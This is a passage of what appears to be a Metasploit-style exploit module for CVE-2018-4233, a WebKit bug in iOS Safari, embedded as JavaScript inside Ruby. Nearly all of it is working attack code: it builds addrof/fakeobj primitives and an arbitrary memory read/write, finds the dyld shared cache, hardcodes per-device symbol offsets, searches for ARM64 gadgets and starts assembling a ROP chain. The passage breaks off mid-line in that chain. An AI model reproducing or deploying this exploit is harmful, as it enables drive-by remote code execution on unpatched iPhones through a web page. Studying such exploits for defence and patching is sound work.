return\r\n end\r\n\r\n get_mem_rw_ios_10 = %Q^\r\nfunction get_mem_rw(stage1) {\r\n var structs = [];\r\n function sprayStructures() {\r\n function randomString() {\r\n return Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5)\r\n }\r\n for (var i = 0; i < 4096; i++) {\r\n var a = new Float64Array(1);\r\n a[randomString()] = 1337;\r\n structs.push(a)\r\n }\r\n }\r\n sprayStructures();\r\n var hax = new Uint8Array(4096);\r\n var 
jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]);\r\n var container = {\r\n jsCellHeader: jsCellHeader.asJSValue(),\r\n butterfly: false,\r\n vector: hax,\r\n lengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue()\r\n };\r\n var address = Add(stage1.addrof(container), 16);\r\n var fakearray = stage1.fakeobj(address);\r\n while (!(fakearray instanceof Float64Array)) {\r\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\r\n container.jsCellHeader = jsCellHeader.asJSValue()\r\n }\r\n memory = {\r\n read: function(addr, length) {\r\n fakearray[2] = i2f(addr);\r\n var a = new Array(length);\r\n for (var i = 0; i < length; i++) a[i] = hax[i];\r\n return a\r\n },\r\n readInt64: function(addr) {\r\n return new Int64(this.read(addr, 8))\r\n },\r\n write: function(addr, data) {\r\n fakearray[2] = i2f(addr);\r\n for (var i = 0; i < data.length; i++) hax[i] = data[i]\r\n },\r\n writeInt64: function(addr, val) {\r\n return this.write(addr, val.bytes())\r\n },\r\n };\r\n var empty = {};\r\n var header = memory.read(stage1.addrof(empty), 8);\r\n memory.write(stage1.addrof(container), header);\r\n var f64array = new Float64Array(8);\r\n header = memory.read(stage1.addrof(f64array), 16);\r\n memory.write(stage1.addrof(fakearray), header);\r\n memory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]);\r\n fakearray.container = container;\r\n return memory;\r\n}\r\n^\r\n\r\n get_mem_rw_ios_11 = %Q^\r\nfunction get_mem_rw(stage1) {\r\n var FPO = typeof(SharedArrayBuffer) === 'undefined' ? 
0x18 : 0x10;\r\n var structure_spray = []\r\n for (var i = 0; i < 1000; ++i) {\r\n var ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff}\r\n ary['prop'+i] = 1\r\n structure_spray.push(ary)\r\n }\r\n var manager = structure_spray[500]\r\n var leak_addr = stage1.addrof(manager)\r\n //print('leaking from: '+ hex(leak_addr))\r\n function alloc_above_manager(expr) {\r\n var res\r\n do {\r\n for (var i = 0; i < ALLOCS; ++i) {\r\n structure_spray.push(eval(expr))\r\n }\r\n res = eval(expr)\r\n } while (stage1.addrof(res) < leak_addr)\r\n return res\r\n }\r\n var unboxed_size = 100\r\n var unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']')\r\n var boxed = alloc_above_manager('[{}]')\r\n var victim = alloc_above_manager('[]')\r\n // Will be stored out-of-line at butterfly - 0x10\r\n victim.p0 = 0x1337\r\n function victim_write(val) {\r\n victim.p0 = val\r\n }\r\n function victim_read() {\r\n return victim.p0\r\n }\r\n i32[0] = 0x200 // Structure ID\r\n i32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing\r\n var outer = {\r\n p0: 0, // Padding, so that the rest of inline properties are 16-byte aligned\r\n p1: f64[0],\r\n p2: manager,\r\n p3: 0xfffffff, // Butterfly indexing mask\r\n }\r\n var fake_addr = stage1.addrof(outer) + FPO + 0x8;\r\n //print('fake obj @ ' + hex(fake_addr))\r\n var unboxed_addr = stage1.addrof(unboxed)\r\n var boxed_addr = stage1.addrof(boxed)\r\n var victim_addr = stage1.addrof(victim)\r\n //print('leak ' + hex(leak_addr)\r\n //+ ' unboxed ' + hex(unboxed_addr)\r\n //+ ' boxed ' + hex(boxed_addr)\r\n //+ ' victim ' + hex(victim_addr))\r\n var holder = {fake: {}}\r\n holder.fake = stage1.fakeobj(fake_addr)\r\n // From here on GC would be uncool\r\n // Share a butterfly for easier boxing/unboxing\r\n var shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8])\r\n var boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8]\r\n holder.fake[(boxed_addr + 8 - leak_addr) / 8] = 
i2f(shared_butterfly)\r\n var victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8]\r\n function set_victim_addr(where) {\r\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10)\r\n }\r\n function reset_victim_addr() {\r\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly\r\n }\r\n var stage2 = {\r\n addrof: function(victim) {\r\n boxed[0] = victim\r\n return f2i(unboxed[0])\r\n },\r\n fakeobj: function(addr) {\r\n unboxed[0] = i2f(addr)\r\n return boxed[0]\r\n },\r\n write64: function(where, what) {\r\n set_victim_addr(where)\r\n victim_write(this.fakeobj(what))\r\n reset_victim_addr()\r\n },\r\n read64: function(where) {\r\n set_victim_addr(where)\r\n var res = this.addrof(victim_read())\r\n reset_victim_addr()\r\n return res;\r\n },\r\n write_non_zero: function(where, values) {\r\n for (var i = 0; i < values.length; ++i) {\r\n if (values[i] != 0)\r\n this.write64(where + i*8, values[i])\r\n }\r\n },\r\n readInt64: function(where) {\r\n if (where instanceof Int64) {\r\n where = Add(where, 0x10);\r\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble();\r\n } else {\r\n set_victim_addr(where);\r\n }\r\n boxed[0] = victim_read();\r\n var res = f2i(unboxed[0]);\r\n reset_victim_addr();\r\n return new Int64(res);\r\n },\r\n read: function(addr, length) {\r\n var address = new Int64(addr);\r\n var a = new Array(length);\r\n var i;\r\n\r\n for (i = 0; i + 8 < length; i += 8) {\r\n v = this.readInt64(Add(address, i)).bytes()\r\n for (var j = 0; j < 8; j++) {\r\n a[i+j] = v[j];\r\n }\r\n }\r\n\r\n v = this.readInt64(Add(address, i)).bytes()\r\n for (var j = i; j < length; j++) {\r\n a[j] = v[j - i];\r\n }\r\n\r\n return a\r\n },\r\n test: function() {\r\n this.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie\r\n if (0xfff != this.read64(boxed_addr + 0x10)) {\r\n fail(2)\r\n }\r\n },\r\n }\r\n // Test read/write\r\n stage2.test()\r\n return stage2;\r\n}\r\n^\r\n\r\n get_mem_rw = (version >= 
Gem::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10\r\n utils = exploit_data \"CVE-2018-4233\", \"utils.js\"\r\n int64 = exploit_data \"CVE-2018-4233\", \"int64.js\"\r\n dump_offsets = ''\r\n if datastore['DUMP_OFFSETS']\r\n dump_offsets = %Q^\r\n var offsetstr = uuid + \" : { \";\r\n var offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\",\r\n \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ];\r\n for (var i = 0; i < offsetarray.length; i++) {\r\n var offset = offsets[offsetarray[i]];\r\n if (offset) {\r\n var offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\");\r\n offsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \";\r\n }\r\n }\r\n offsetstr += \"}, \";\r\n prompt(\"offsets: \", offsetstr);\r\n^\r\n end\r\n\r\n html = %Q^\r\n<html>\r\n<body>\r\n<script>\r\n\r\n#{utils}\r\n#{int64}\r\n\r\nprint = alert;\r\nITERS = 1E4;\r\nALLOCS = 1E3;\r\n\r\nvar conversion_buffer = new ArrayBuffer(8);\r\nvar f64 = new Float64Array(conversion_buffer);\r\nvar i32 = new Uint32Array(conversion_buffer);\r\nvar BASE32 = 0x100000000;\r\n\r\nfunction f2i(f) {\r\n f64[0] = f;\r\n return i32[0] + BASE32 * i32[1];\r\n}\r\n\r\nfunction i2f(i) {\r\n i32[0] = i % BASE32;\r\n i32[1] = i / BASE32;\r\n return f64[0];\r\n}\r\n\r\nfunction hexit(x) {\r\n if (x instanceof Int64) return x.toString();\r\n if (x < 0) return \"-\" + hex(-x);\r\n return \"0x\" + x.toString(16);\r\n}\r\n\r\nfunction fail(x) {\r\n print('FAIL ' + x);\r\n location.reload();\r\n throw null;\r\n}\r\n\r\ncounter = 0;\r\n\r\n// CVE-2018-4233\r\nfunction trigger(constr, modify, res, val) {\r\n return eval(`\r\n var o = [13.37]\r\n var Constructor${counter} = function(o) { ${constr} }\r\n var hack = false\r\n var 
Wrapper = new Proxy(Constructor${counter}, {\r\n get: function() {\r\n if (hack) {\r\n ${modify}\r\n }\r\n }\r\n })\r\n for (var i = 0; i < ITERS; ++i)\r\n new Wrapper(o)\r\n hack = true\r\n var bar = new Wrapper(o)\r\n ${res}\r\n `)\r\n}\r\n\r\nvar workbuf = new ArrayBuffer(0x1000000);\r\nvar payload = new Uint8Array(workbuf);\r\n\r\nfunction pwn() {\r\n var stage1 = {\r\n addrof: function(victim) {\r\n return f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim))\r\n },\r\n fakeobj: function(addr) {\r\n return trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr))\r\n },\r\n test: function() {\r\n var addr = this.addrof({\r\n a: 4919\r\n });\r\n var x = this.fakeobj(addr);\r\n if (x.a != 4919) fail(\"stage1\")\r\n }\r\n };\r\n stage1.test();\r\n\r\n var stage2 = get_mem_rw(stage1);\r\n var FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"}\r\n var memory = stage2;\r\n memory.u32 = _u32;\r\n\r\n var wrapper = document.createElement(\"div\");\r\n var wrapper_addr = stage1.addrof(wrapper);\r\n var el_addr = memory.readInt64(wrapper_addr + FPO);\r\n var vtab = memory.readInt64(el_addr);\r\n\r\n var anchor = memory.readInt64(vtab);\r\n var hdr = Sub(anchor, anchor.lo() & 0xfff);\r\n var b = [];\r\n while(true)\r\n {\r\n if (memory.readInt64(hdr).lo() == 4277009104) {\r\n fail('WebCore ' + hdr + ' post spectre support coming soon');\r\n }\r\n if(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\"))\r\n {\r\n break;\r\n }\r\n hdr = Sub(hdr, 0x1000);\r\n }\r\n\r\n var base_seg = null;\r\n var nsegs = memory.u32(Add(hdr, 0x14));\r\n var segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20);\r\n var segs = [];\r\n for(var i = 0; i < nsegs; ++i)\r\n {\r\n var off = i * 0x20;\r\n var seg =\r\n {\r\n addr: new Int64(segdata.slice(off + 0x0, off + 0x8)),\r\n size: new Int64(segdata.slice(off + 0x8, off + 0x10)),\r\n fileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)),\r\n maxprot: 
b2u32(segdata.slice(off + 0x18, off + 0x1c)),\r\n initprot: b2u32(segdata.slice(off + 0x1c, off + 0x20))\r\n };\r\n segs.push(seg);\r\n if(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0))\r\n {\r\n base_seg = seg;\r\n }\r\n }\r\n if(base_seg == null)\r\n {\r\n fail(\"base_seg\");\r\n }\r\n\r\n var cache_slide = Sub(hdr, base_seg.addr);\r\n var uuid = memory.readInt64(Add(hdr, 0x58)).lo();\r\n var offset_cache = {\r\n // iPod Touch 10.1.1\r\n 788795426 : { \"_dlsym\" : 0x18052ddd8, \"_dlopen\" : 0x18052dd10, \"__longjmp\" : 0x1806ffb78, \"regloader\" : 0x180f0622c, \"dispatch\" : 0x180d7e058, \"stackloader\" : 0x18099a8e8, \"_mach_task_self_\" : 0x1a586e3bc,\r\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806240a4, \"__platform_memmove\" : 0x1806ffe00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a457c438, },\r\n\r\n // iPhone 5S 10.2.1\r\n 3432281541 : { \"_dlsym\" : 0x18052edd8, \"_dlopen\" : 0x18052ed10, \"__longjmp\" : 0x180700b78, \"regloader\" : 0x180f07230, \"dispatch\" : 0x180d7f05c, \"stackloader\" : 0x18099b8ec, \"mach_task_self\" : 0x1a6da23bc,\r\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806250c0, \"__platform_memmove\" : 0x180700e00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a5a0d438, },\r\n\r\n // iPhone 6S 11.0.3\r\n 425478416 : { \"_dlsym\" : 0x180587574, \"_dlopen\" : 0x180587460, \"__longjmp\" : 0x1807bd7dc, \"regloader\" : 0x180051ad8, \"dispatch\" : 0x19b323a4c, \"stackloader\" : 0x19b2e6f40, \"movx4\" : 0x19b33305c,\r\n \"ldrx8\" : 0x180060028, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1b15d8a00, \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\" : 0x1b15d8a08, \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\" : 0x1b15d89f8, },\r\n };\r\n\r\n var offsets = offset_cache[uuid];\r\n if (offsets)\r\n {\r\n var k = Object.keys(offsets);\r\n for(var i = 0; i < k.length; ++i)\r\n {\r\n var s = k[i];\r\n offsets[s] = Add(offsets[s], cache_slide);\r\n }\r\n }\r\n else\r\n {\r\n var syms = {};\r\n 
var gadgets = {};\r\n\r\n for(var i = 0; i < segs.length; ++i)\r\n {\r\n segs[i].addr = Add(segs[i].addr, cache_slide);\r\n }\r\n var libs =\r\n {\r\n \"/usr/lib/system/libdyld.dylib\": [\"_dlsym\", \"_dlopen\"],\r\n #{ ios_11 ? '\r\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"],\r\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\"],\r\n ' : '\r\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\", \"__platform_memmove\"],\r\n \"/usr/lib/system/libsystem_kernel.dylib\": [\"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\"],\r\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"],\r\n '}\r\n }\r\n\r\n #{ ios_11 ? '\r\n var opcodes = {\r\n // ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret\r\n \"ldrx8\": [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ],\r\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\r\n \"dispatch\": [ [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ] ],\r\n // mov x3, x22 ; mov x6, x27 ; mov x0, x24 ; mov x1, x19 ; mov x2, x23 ; ldr x4, [sp] ; blr x8\r\n \"regloader\": [ [ 0xaa1603e3, 0xaa1b03e6, 0xaa1803e0, 0xaa1303e1, 0xaa1703e2, 0xf94003e4, 0xd63f0100 ] ],\r\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\r\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\r\n \"stackloader\": [ [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ] ],\r\n // mov x4, x20 ; blr x8\r\n \"movx4\": [ [ 0xaa1403e4, 0xd63f0100 ] ],\r\n }\r\n var opcode_libs = [\r\n \"/usr/lib/PN548.dylib\", // dispatch, stackloader\r\n \"/usr/lib/libc++.1.dylib\", // ldrx8, regloader, movx4, 
stackloader\r\n ];\r\n\r\n ' : '\r\n var opcodes = {\r\n // mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28\r\n \"regloader\": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ],\r\n \"dispatch\": [\r\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\r\n [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ],\r\n // blr x21; sub sp, x29, 0x20; ldp x29, x30, [sp, 0x20]; ldp x20, x19, [sp, 0x10]; ldp x22, x21, [sp], 0x30; ret\r\n [ 0xd63f02a0, 0xd10083bf, 0xa9427bfd, 0xa9414ff4, 0xa8c357f6, 0xd65f03c0 ],\r\n ],\r\n \"stackloader\": [\r\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\r\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\r\n [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ],\r\n // sub sp, x29, 0x50; ldp x29, x30, [sp, 0x50]; ldp x20, x19, [sp, 0x40]; ldp x22, x21, [sp, 0x30];\r\n // ldp x24, x23, [sp, 0x20]; ldp x26, x25, [sp, 0x10]; ldp x28, x27, [sp], 0x60; ret\r\n [ 0xd10143bf, 0xa9457bfd, 0xa9444ff4, 0xa94357f6, 0xa9425ff8, 0xa94167fa, 0xa8c66ffc, 0xd65f03c0 ],\r\n ],\r\n };\r\n\r\n var opcode_libs = [ \"/usr/lib/libLLVM.dylib\" ];\r\n '}\r\n\r\n var imgs = Add(hdr, memory.u32(Add(hdr, 0x18)));\r\n var nimgs = memory.u32(Add(hdr, 0x1c));\r\n for(var i = 0; i < nimgs; ++i)\r\n {\r\n var straddr = off2addr(segs, memory.u32(Add(imgs, i * 0x20 + 0x18)));\r\n var fn = function(i)\r\n {\r\n return memory.read(Add(straddr, i), 1)[0];\r\n };\r\n var base = Add(memory.readInt64(Add(imgs, i * 0x20)), cache_slide);\r\n if(opcode_libs.some(lib => strcmp(fn, lib)))\r\n {\r\n var ncmds = memory.u32(Add(base, 0x10));\r\n for(var j = 0, off = 0x20; j < ncmds; ++j)\r\n {\r\n var cmd = memory.u32(Add(base, off));\r\n if(cmd == 0x19 && strcmp(memory.read(Add(base, off + 
0x8), 0x10), \"__TEXT\")) // LC_SEGMENT_64\r\n {\r\n var nsects = memory.u32(Add(base, off + 0x40));\r\n for(var k = 0, o = off + 0x48; k < nsects; ++k)\r\n {\r\n if(strcmp(memory.read(Add(base, o), 0x10), \"__text\"))\r\n {\r\n var keys = Object.keys(opcodes).filter(k=>!gadgets.hasOwnProperty[k])\r\n if (keys.length == 0) break;\r\n\r\n var addr = Add(memory.readInt64(Add(base, o + 0x20)), cache_slide)\r\n var size = memory.u32(Add(base, o + 0x28))\r\n\r\n // Copy the entire __text region into a Uint32Array for faster processing.\r\n // Previously you could map a Uint32Array over the data, but on i7+ devices\r\n // this caused access violations.\r\n // Instead we read the entire region and copy it into a Uint32Array. The\r\n // memory.read primitive has a weird limitation where it's only able to read\r\n // up to 4096 bytes. to get around this we'll read multiple times and combine\r\n // them into one.\r\n\r\n var allData = new Uint32Array(size / 4)\r\n for (var r = 0; r < size; r += 4096) {\r\n // Check to ensure we don't read out of the region we want\r\n var qty = 4096\r\n if (size - r < qty) {\r\n qty = size - r\r\n }\r\n var data = memory.read(Add(addr, r), qty)\r\n\r\n // Data is an array of single bytes. This code takes four entries\r\n // and converts them into a single 32-bit integer. 
It then adds it\r\n // into the `allData` array at the given index\r\n for (var h = 0; h < qty; h += 4) {\r\n var fourBytes = b2u32(data.slice(h, h + 4))\r\n allData[(r + h) / 4] = fourBytes\r\n }\r\n }\r\n\r\n // Loop through the entire data map looking for each gadget we need\r\n for (var f = 0; f < size && keys.length > 0; f++) {\r\n\r\n // Check every gadget\r\n for (var z = 0; z < keys.length; z++) {\r\n var key = keys[z];\r\n var opcode_list = opcodes[key];\r\n for (var y = 0; y < opcode_list.length; y++) {\r\n var opcode = opcode_list[y];\r\n for (var t = 0; t < opcode.length; t++) {\r\n var op = allData[f+t];\r\n if (op == opcode[t]) {\r\n if (t == opcode.length - 1) {\r\n gadgets[key] = Add(addr, f*4);\r\n keys.splice(z, 1);\r\n z = keys.length;\r\n break;\r\n }\r\n continue;\r\n }\r\n break;\r\n }\r\n }\r\n }\r\n }\r\n\r\n break;\r\n }\r\n o += 0x50;\r\n }\r\n break;\r\n }\r\n off += memory.u32(Add(base, off + 0x4));\r\n }\r\n continue;\r\n }\r\n var lookup = null;\r\n for(var k = Object.keys(libs), j = 0; j < k.length; ++j)\r\n {\r\n if(strcmp(fn, k[j]))\r\n {\r\n lookup = libs[k[j]];\r\n break;\r\n }\r\n }\r\n if(lookup != null)\r\n {\r\n fsyms(memory, base, segs, lookup, syms);\r\n }\r\n }\r\n\r\n var vals = Object.keys(libs).map(function(key) {\r\n return libs[key];\r\n });\r\n var k = vals.reduce(function(p,c){ c.forEach(function(e){ p.push(e) });return p; }, []);\r\n for(var i = 0; i < k.length; ++i)\r\n {\r\n var s = k[i];\r\n if(syms[s] == null)\r\n {\r\n fail(s);\r\n }\r\n syms[s] = Add(syms[s], cache_slide);\r\n }\r\n k = Object.keys(opcodes);\r\n for(var i = 0; i < k.length; ++i)\r\n {\r\n var s = k[i];\r\n if(gadgets[s] == null)\r\n {\r\n fail(s);\r\n }\r\n }\r\n\r\n offsets = {}\r\n offsets[\"regloader\"] = gadgets[\"regloader\"];\r\n offsets[\"dispatch\"] = gadgets[\"dispatch\"];\r\n offsets[\"stackloader\"] = gadgets[\"stackloader\"];\r\n offsets[\"ldrx8\"] = gadgets[\"ldrx8\"];\r\n offsets[\"movx4\"] = gadgets[\"movx4\"];\r\n 
offsets[\"__longjmp\"] = syms[\"__longjmp\"];\r\n offsets[\"__kernelrpc_mach_vm_protect_trap\"] = syms[\"__kernelrpc_mach_vm_protect_trap\"];\r\n offsets[\"__platform_memmove\"] = syms[\"__platform_memmove\"];\r\n offsets[\"_dlopen\"] = syms[\"_dlopen\"];\r\n offsets[\"_dlsym\"] = syms[\"_dlsym\"];\r\n offsets[\"_mach_task_self_\"] = syms[\"_mach_task_self_\"];\r\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\r\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\r\n offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] = syms[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"];\r\n\r\n if (offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] != null) {\r\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], 8);\r\n }\r\n #{ ios_11 ? '\r\n if (offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] != null) {\r\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], 8);\r\n }' : ''}\r\n\r\n#{dump_offsets}\r\n\r\n }\r\n\r\n\r\n var regloader = offsets[\"regloader\"];\r\n var dispatch = offsets[\"dispatch\"];\r\n var stackloader = offsets[\"stackloader\"];\r\n var longjmp = offsets[\"__longjmp\"];\r\n var mach_vm_protect = offsets[\"__kernelrpc_mach_vm_protect_trap\"];\r\n var memmove = offsets[\"__platform_memmove\"];\r\n var dlopen = offsets[\"_dlopen\"];\r\n var dlsym = offsets[\"_dlsym\"];\r\n var task_self = offsets[\"_mach_task_self_\"]\r\n var endOfFixedMem = offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\r\n var startOfFixedMem = offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\r\n\r\n var ldrx8 = offsets[\"ldrx8\"]; // might be null\r\n var movx4 = 
offsets[\"movx4\"]; // might be null\r\n\r\n var mach_task_self_ = new Int64(memory.readInt64(task_self).lo());\r\n var memPoolEnd = memory.readInt64(endOfFixedMem);\r\n\r\n var memPoolStart = Int64.Zero;\r\n if (startOfFixedMem) {\r\n memPoolStart = memory.readInt64(startOfFixedMem);\r\n }\r\n\r\n var jitWriteSeparateHeaps = Int64.Zero;\r\n if (offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]) {\r\n jitWriteSeparateHeaps = memory.readInt64(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]);\r\n }\r\n\r\n var shsz = new Int64(\"0x100000\");\r\n var paddr = memory.readInt64(Add(stage1.addrof(payload), 0x10));\r\n var codeAddr = Sub(memPoolEnd, shsz);\r\n codeAddr = Sub(codeAddr, codeAddr.lo() & 0x3fff);\r\n\r\n memory.writeInt64(Add(vtab, 0x18), longjmp);\r\n memory.writeInt64(Add(el_addr, 0x58), stackloader); // x30 (gadget)\r\n\r\n var arrsz = 0x100000,\r\n off = 0x1000;\r\n var arr = new Uint32Array(arrsz);\r\n var stack = memory.readInt64(Add(stage1.addrof(arr), 0x10));\r\n\r\n var pos = arrsz - off;\r\n\r\n var add_call_llvm = function(func, x0, x1, x2, x3, x4, jump_to) {\r\n x4 = x4 || Int64.Zero\r\n\r\n // in stackloader:\r\n arr[pos++] = 0xdead0010; // unused\r\n arr[pos++] = 0xdead0011; // unused\r\n arr[pos++] = 0xdead0012; // unused\r\n arr[pos++] = 0xdead0013; // unused\r\n arr[pos++] = dispatch.lo(); // x28 (gadget for regloader)\r\n arr[pos++] = dispatch.hi(); // x28 (gadget for regloader)\r\n arr[pos++] = 0xdead0014; // x27 (unused)\r\n arr[pos++] = 0xdead0015; // x27 (unused)\r\n arr[pos++] = x4.lo(); // x26 == x4 (arg5)\r\n arr[pos++] = x4.hi(); // x26 == x4 (arg5)\r\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\r\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\r\n arr[pos++] = x2.lo(); // x24 == x2 (arg3)\r\n arr[pos++] = x2.hi(); // x24 == x2 (arg3)\r\n arr[pos++] = x0.lo(); // x23 == x0 (arg1)\r\n arr[pos++] = x0.hi(); // x23 == x0 (arg1)\r\n arr[pos++] = x1.lo(); // x22 == x1 (arg2)\r\n arr[pos++] = x1.hi(); // x22 == x1 (arg2)\r\n arr[pos++] 
= func.lo(); // x21 (func)\r\n arr[pos++] = func.hi(); // x21 (func)\r\n arr[pos++] = 0xdbad0018; // x20 (unused)\r\n arr[pos++] = 0xdbad0019; // x20 (unused)\r\n arr[pos++] = 0xdead001a; // x19 (unused)\r\n arr[pos++] = 0xdead001b; // x19 (unused)\r\n var tmppos = pos;\r\n arr[pos++] = Add(stack, tmppos*4 + 0x40).lo(); // x29\r\n arr[pos++] = Add(stack, tmppos*4 + 0x40).hi(); // x29\r\n arr[pos++] = regloader.lo(); // x30 (first gadget)\r\n arr[pos++] = regloader.hi(); // x30 (first gadget)\r\n\r\n // after dispatch:\r\n arr[pos++] = 0xdead0020; // unused\r\n arr[pos++] = 0xdead0021; // unused\r\n arr[pos++] = 0xdead0022; // unused\r\n arr[pos++] = 0xdead0023; // unused\r\n arr[pos++] = 0xdead0024; // x22 (unused)\r\n arr[pos++] = 0xdead0025; // x22 (unused)\r\n arr[pos++] = 0xdead0026; // x21 (unused)\r\n arr[pos++] = 0xdead0027; // x21 (unused)\r\n arr[pos++] = 0xdead0028; // x20 (unused)\r\n arr[pos++] = 0xdead0029; // x20 (unused)\r\n arr[pos++] = 0xdead002a; // x19 (unused)\r\n arr[pos++] = 0xdead002b; // x19 (unused)\r\n tmppos = pos;\r\n arr[pos++] = Add(stack, tmppos*4 + 0x70).lo(); // x29\r\n arr[pos++] = Add(stack, tmppos*4 + 0x70).hi(); // x29\r\n arr[pos++] = jump_to.lo(); // x30 (gadget)\r\n arr[pos++] = jump_to.hi(); // x30 (gadget)\r\n }\r\n\r\n var add_call_via_x8 = function(func, x0, x1, x2, x3, x4, jump_to) {\r\n //alert(`add_call_via_x8: ${func}(${x0}, ${x1}, ${x2}, ${x3}, ${x4}, ${jump_to})`);\r\n //x4 = x4 || Int64.One\r\n // in stackloader:\r\n arr[pos++] = 0xdead0010; // unused\r\n arr[pos++] = 0xdead0011; // unused\r\n arr[pos++] = 0xdead0012; // unused\r\n arr[pos++] = 0xdead0013; // unused\r\n arr[pos++] = 0xdead1101; // x28 (unused)\r\n arr[pos++] = 0xdead1102; // x28 (unused)\r\n arr[pos++] = 0xdead0014; // x27 == x6 (unused)\r\n arr[pos++] = 0xdead0015; // x27 == x6 (unused)\r\n arr[pos++] 